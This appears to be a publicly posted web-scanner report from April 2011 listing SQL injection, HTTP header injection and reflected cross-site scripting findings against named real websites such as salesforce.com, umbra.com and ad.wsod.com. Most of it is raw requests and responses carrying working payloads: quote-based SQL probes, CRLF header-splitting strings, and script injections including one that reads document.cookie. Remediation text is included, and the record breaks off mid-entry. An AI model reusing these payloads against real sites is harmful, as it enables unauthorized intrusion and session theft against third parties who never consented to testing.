SQL Injection, HTTP Response Splitting, Reflected Cross Site Scripting, CWE-79, CWE-89, CWE-113, DORK Report, GHDB, April 21, 2011

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. https://theautomatedsystem.com/pub/ [User-Agent HTTP header] next

Summary

Severity:	High
Confidence:	Certain
Host:	https://theautomatedsystem.com
Path:	/pub/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /pub/?ref=1 HTTP/1.1
Host: theautomatedsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 18:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.8-pl2-gentoo
Set-Cookie: ref=1; expires=Thu, 21-Apr-2011 20:32:13 GMT
Set-Cookie: affil=deleted; expires=Wed, 21-Apr-2010 18:32:13 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 15356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-
...[SNIP]...
<TR>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243')' at line 2

Request 2

GET /pub/?ref=1 HTTP/1.1
Host: theautomatedsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 18:32:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.8-pl2-gentoo
Set-Cookie: ref=1; expires=Thu, 21-Apr-2011 20:32:14 GMT
Set-Cookie: affil=deleted; expires=Wed, 21-Apr-2010 18:32:13 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-
...[SNIP]...

1.2. http://www.brothersoft.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.brothersoft.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brothersoft.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: BSWS/1.3
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.6
Content-Length: 16973
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 04:49:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/eudora-11805.html" title="Eudora">
...[SNIP]...

1.3. http://www.essortment.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.essortment.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 02:28:24 GMT
Connection: close

You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Thu, 21 Apr 2011 02:28:25 GMT
Content-Length: 14383
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

2. HTTP header injection previous next
There are 6 instances of this issue:

http://www.homestead.com/favicon.ico [REST URL parameter 1]
http://www.livingsocial.com/favicon.ico [REST URL parameter 1]
http://www.salesforce.com/favicon.ico [REST URL parameter 1]
http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.umbra.com/favicon.ico [REST URL parameter 1]
http://www.umbra.com/styles.css [REST URL parameter 1]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://www.homestead.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homestead.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 47ab5%0d%0afa706c89e67 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /47ab5%0d%0afa706c89e67 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homestead.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Thu, 21 Apr 2011 02:39:33 GMT
Location: /47ab5
fa706c89e67/

2.2. http://www.livingsocial.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.livingsocial.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d57c8%0d%0a91048eb8298 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d57c8%0d%0a91048eb8298 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livingsocial.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 21 Apr 2011 02:35:35 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://livingsocial.com/d57c8
91048eb8298

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

2.3. http://www.salesforce.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.salesforce.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24112%0d%0a6c301a924fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24112%0d%0a6c301a924fb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /24112
6c301a924fb/
Date: Thu, 21 Apr 2011 02:22:27 GMT
Content-Length: 77

The URL has moved to <a href="/24112
6c301a924fb/">/24112
6c301a924fb/</a>

2.4. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shop.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 6ce8b%0d%0a5ccd041944b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?6ce8b%0d%0a5ccd041944b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 21 Apr 2011 02:24:23 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?6ce8b
5ccd041944b=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?6ce8b
5ccd041944b=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...

2.5. http://www.umbra.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ba406%0d%0abd2cb208551 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ba406%0d%0abd2cb208551 HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=i60287q2tl2t9n774bnp8aap13

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 21 Apr 2011 02:43:12 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.umbra.com/ba406
bd2cb208551/home.site
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

2.6. http://www.umbra.com/styles.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1da26%0d%0a29854674df7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1da26%0d%0a29854674df7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.umbra.com

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 21 Apr 2011 02:30:24 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.umbra.com/1da26
29854674df7/home.site
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

3. Cross-site scripting (reflected) previous next
There are 59 instances of this issue:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389828** [10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fq%3DEnter%2BKeywords%2Bor%2BTicker_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x000BAB%2520?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389828** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389834** [10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fsort%3Ddate_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x001D4C%2520?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389834** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389873** [0,0,0;1920;1200;about%3Ablank?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389873** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873 [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873 [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873 [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436 [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436 [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436 [name of an arbitrarily supplied request parameter]
http://multiply.com/favicon.ico [REST URL parameter 1]
https://theautomatedsystem.com/pub/ [name of an arbitrarily supplied request parameter]
https://theautomatedsystem.com/pub/ [ref parameter]
https://theautomatedsystem.com/pub/ [ref parameter]
http://widgets.digg.com/buttons/count [url parameter]
http://www.4shared.com/favicon.ico [REST URL parameter 1]
http://www.4shared.com/favicon.ico [REST URL parameter 1]
http://www.biblegateway.com/favicon.ico [REST URL parameter 1]
http://www.biblegateway.com/favicon.ico [REST URL parameter 1]
http://www.education.com/favicon.ico [REST URL parameter 1]
http://www.fool.com/search/solr.aspx [sort parameter]
http://www.fool.com/search/solr.aspx [sort parameter]
http://www.fool.com/search/solr.aspx [source parameter]
http://www.gamestop.com/favicon.ico [REST URL parameter 1]
http://www.invokemedia.com/company/contact-us/ [name of an arbitrarily supplied request parameter]
http://www.manta.com/favicon.ico [REST URL parameter 1]
http://www.manta.com/favicon.ico [REST URL parameter 1]
http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]
http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.outcastacademy.com/webmasteroutcast.php [name of an arbitrarily supplied request parameter]
http://www.outcastacademy.com/webmasteroutcast.php [weblink parameter]
http://www.outcastacademy.com/webmasteroutcast.php [weblink parameter]
http://www.shangri-la.com/favicon.ico [REST URL parameter 1]
http://www.theatlantic.com/favicon.ico [REST URL parameter 1]
http://www.trails.com/favicon.ico [REST URL parameter 1]
http://www.umbra.com/local/pressimages/index.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) [REST URL parameter 4]
http://www.umbra.com/local/pressimages/index.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) [REST URL parameter 4]
http://www.umbra.com/local/pressimages/index.php/%22%20stYle=%22x:expre/**/style/style.css [REST URL parameter 4]
http://www.umbra.com/local/pressimages/index.php/%22%20stYle=%22x:expre/**/style/style.css [REST URL parameter 4]
http://www.umbra.com/local/pressimages/index.php/style/style.css [REST URL parameter 4]
http://www.umbra.com/local/pressimages/index.php/style/style.css [REST URL parameter 5]
http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 4]
http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 4]
http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 5]
http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 5]
http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 6]
http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 7]
http://www.umbra.com/ustore/login.site [redirect-url parameter]
http://www.fool.com/favicon.ico [Referer HTTP header]
http://www.canada.com/favicon.ico [REST URL parameter 1]
http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389828**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fq%3DEnter%2BKeywords%2Bor%2BTicker_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x000BAB%2520?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dfcb'-alert(1)-'d2b1a6f1a5a was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fq%3DEnter%2BKeywords%2Bor%2BTicker_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x000BAB%2520?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389828**;10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fq%3DEnter%2BKeywords%2Bor%2BTicker_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x000BAB%2520?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f4dfcb'-alert(1)-'d2b1a6f1a5a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.fool.com/search/solr.aspx?q=Enter+Keywords+or+Ticker&source=%27%22%20ns=%20netsparker(0x000BAB)%20
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:44:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db0269bb8a63; expires=Sun, 22-May-2011 12:44:11 GMT; path=/
Set-Cookie: i_1=23:257:818:6:0:44608:1303389851:L; expires=Sat, 21-May-2011 12:44:11 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 755

function wsod_image257() {
document.write('<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f4dfcb'-alert(1)-'d2b1a6f1a5ahttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/257.818.js.728x90/**;10.2154;1920;1200;http:_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fq=Enter Keywords or Ticker_@26source= ns= netsparker
...[SNIP]...

3.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389828** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389828**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f85'-alert(1)-'e66e90ffd70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389828**;10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fq%3DEnter%2BKeywords%2Bor%2BTicker_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x000BAB%2520?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f&a5f85'-alert(1)-'e66e90ffd70=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.fool.com/search/solr.aspx?q=Enter+Keywords+or+Ticker&source=%27%22%20ns=%20netsparker(0x000BAB)%20
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:44:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db026b83e049; expires=Sun, 22-May-2011 12:44:40 GMT; path=/
Set-Cookie: i_1=23:257:1074:6:0:44608:1303389880:L; expires=Sat, 21-May-2011 12:44:40 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 758

function wsod_image257() {
document.write('<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f&a5f85'-alert(1)-'e66e90ffd70=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/257.1074.js.728x90/**;10.2154;1920;1200;http:_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fq=Enter Keywords or Ticker_@26source= ns= netspar
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389834**

Issue detail

